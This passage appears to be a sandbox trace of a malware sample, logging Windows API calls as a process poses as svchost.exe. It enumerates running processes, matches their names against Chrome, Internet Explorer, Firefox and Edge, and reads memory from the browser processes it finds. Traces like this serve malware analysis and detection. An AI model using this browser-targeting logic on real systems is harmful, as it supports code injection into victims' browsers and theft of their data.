	[0194.252] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.252] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0194.253] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.253] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.253] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0194.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xbec
	[0194.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.254] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0194.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.254] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.255] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0194.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.255] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.256] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0194.256] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xbf0
	[0194.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.256] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0194.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.257] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.257] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0194.257] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.257] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.257] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0194.258] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xbf4
	[0194.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.258] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0194.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.259] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.259] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0194.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.259] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.260] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0194.260] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xbf8
	[0194.260] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.261] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0194.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.261] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.261] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.261] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0194.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.262] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.262] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0194.263] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xbfc
	[0194.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.263] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0194.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.263] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.264] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0194.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.264] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.264] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0194.265] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xc00
	[0194.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.265] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0194.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.265] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.265] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0194.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.266] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.266] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0194.266] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xc04
	[0194.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.266] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0194.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.267] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.296] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0194.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.296] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.297] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0194.297] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xc08
	[0194.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.297] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0194.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.298] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.299] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0194.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.300] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.300] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0194.301] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xc0c
	[0194.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.302] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0194.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.303] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.303] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0194.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.304] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.304] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0194.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xc10
	[0194.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.305] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0194.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.305] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.306] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0194.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.307] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.307] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0194.308] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xc14
	[0194.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.308] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0194.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.308] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.309] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0194.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.309] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.310] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0194.310] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xc18
	[0194.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.310] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0194.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.311] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0194.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.311] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0194.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.311] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.311] NtQueryInformationProcess (in: ProcessHandle=0xc18, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0194.311] ReadProcessMemory (in: hProcess=0xc18, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0194.311] ReadProcessMemory (in: hProcess=0xc18, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0194.312] ReadProcessMemory (in: hProcess=0xc18, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0194.312] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0194.312] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0194.312] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xc1c
	[0194.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.313] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0194.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.313] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0194.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.313] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0194.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.313] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.314] NtQueryInformationProcess (in: ProcessHandle=0xc1c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0194.314] ReadProcessMemory (in: hProcess=0xc1c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0194.314] ReadProcessMemory (in: hProcess=0xc1c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0194.314] ReadProcessMemory (in: hProcess=0xc1c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0194.314] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0194.316] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0194.316] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xc20
	[0194.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.316] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0194.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.317] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.317] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0194.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.317] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.317] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0194.318] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xc24
	[0194.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.318] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0194.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.319] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.319] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0194.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.319] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.319] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.320] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xc28
	[0194.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.320] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0194.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.321] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.321] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0194.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.321] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.321] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0194.322] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0194.323] CloseHandle (hObject=0x188) returned 1
	[0194.323] Sleep (dwMilliseconds=0x64) 
	[0194.424] GetCurrentProcessId () returned 0x110
	[0194.424] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0194.429] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0194.431] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0194.433] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0194.434] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xc2c
	[0194.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.434] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.434] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.434] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.435] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.435] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0194.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xc30
	[0194.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.436] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.436] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.436] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.437] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.437] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0194.437] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xc34
	[0194.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.437] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0194.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.438] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.438] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0194.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.438] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.439] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0194.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xc38
	[0194.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.439] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0194.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.440] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.440] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0194.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.440] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0194.440] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0194.441] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xc3c
	[0194.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.441] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0194.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.442] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0194.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.442] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0194.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0194.442] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
